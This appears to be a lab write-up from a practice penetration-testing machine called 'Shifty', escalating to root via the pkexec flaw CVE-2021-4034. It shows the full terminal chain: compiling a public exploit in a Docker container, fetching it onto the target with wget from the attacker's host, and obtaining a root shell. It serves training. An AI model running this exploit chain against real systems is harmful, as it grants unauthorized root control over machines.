CVE-2021-4034
PEAS has identified that the target system is vulnerable to CVE-2021-4034
/Practice/Shifty/5-Privilege_Escalation/attachments/{44342893-32D1-42A5-B197-F645BB5284DE}.png)
A vulnerability, which was classified as critical, has been found in polkit (version now known). This issue affects some unknown processing of the file /usr/bin/pkexec. The manipulation with an unknown input leads to a access control vulnerability. Using CWE to declare the problem leads to CWE-284. The product does not restrict or incorrectly restricts access to a resource from an unauthorized actor. Impacted is confidentiality, integrity, and availability.
Exploit
/Practice/Shifty/5-Privilege_Escalation/attachments/{ACB21781-01A4-4C99-909B-F1CFE9F1944B}.png)
Exploit found online
jerry@shifty:/dev/shm$ cc
-bash: cc: command not found
jerry@shifty:/dev/shm$ gcc
-bash: gcc: command not foundNo compiler found. Opting out to remote compiliation.
Docker Exploit Development
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/shifty]
└─$ docker run -it --entrypoint "/bin/bash" -v ./:/root/host --name shifty debian:9
root@ccdc86469513:/# ldd --version
ldd (Debian GLIBC 2.24-11+deb9u4) 2.24
Copyright (C) 2016 Free Software Foundation, Inc.
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.
root@ccdc86469513:/# tee /etc/apt/sources.list > /dev/null <<EOF
> deb http://archive.debian.org/debian/ stretch main contrib non-free
> deb http://archive.debian.org/debian/ stretch-proposed-updates main contrib non-free
> deb http://archive.debian.org/debian-security stretch/updates main contrib non-free
> EOF
root@ccdc86469513:/# apt update -y; apt install git make nano gcc gcc-multilib make -ySetting up the environment
root@ccdc86469513:/# git clone https://github.com/berdav/CVE-2021-4034; cd CVE-2021-4034; make; cd ..; tar -czf CVE-2021-4034.tar.gz ./CVE-2021-4034; cp CVE-2021-4034.tar.gz /root/host/Downloading, compiling & packaging the exploit
Exploitation
jerry@shifty:/dev/shm$ wget -q http://192.168.45.153/CVE-2021-4034.tar.gz; tar -xf CVE-2021-4034.tar.gz ; cd CVE-2021-4034Delivery complete
jerry@shifty:/dev/shm/CVE-2021-4034$ ./cve-2021-4034
# whoami
root
# hostname
shifty
# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
2: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:50:56:9e:d3:9d brd ff:ff:ff:ff:ff:ff
inet 192.168.219.59/24 brd 192.168.219.255 scope global ens192
valid_lft forever preferred_lft foreverSystem level compromise